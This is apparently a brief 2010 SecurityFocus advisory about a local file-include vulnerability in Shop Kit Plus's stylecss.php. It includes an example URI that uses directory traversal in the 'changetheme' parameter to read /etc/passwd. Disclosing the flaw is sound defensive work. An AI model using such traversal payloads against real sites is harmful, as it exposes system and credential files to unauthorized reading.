Shop Kit Plus StyleCSS.PHP Local File Include Vulnerability

Attackers can exploit this issue via a web client.

The following example URI demonstrates the local file-include issue:

http://www.example.com/shopkitplus/enc/stylecss.php?changetheme=../../../../../../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus